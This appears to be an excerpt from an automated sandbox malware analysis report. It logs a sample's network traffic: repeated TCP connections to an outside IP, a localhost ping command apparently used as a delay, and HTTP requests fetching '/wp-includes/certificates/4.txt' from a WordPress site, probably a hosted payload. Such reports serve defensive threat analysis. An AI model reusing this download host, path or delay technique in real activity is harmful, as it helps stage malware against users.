Source: global trafficTCP traffic: 192.168.2.22:49182 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 187.45.240.69:80

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox ViewIP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox ViewIP Address: 104.18.11.207 104.18.11.207
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/certificates/4.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/bootstrap.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: netdna.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/responsive.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/main-style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
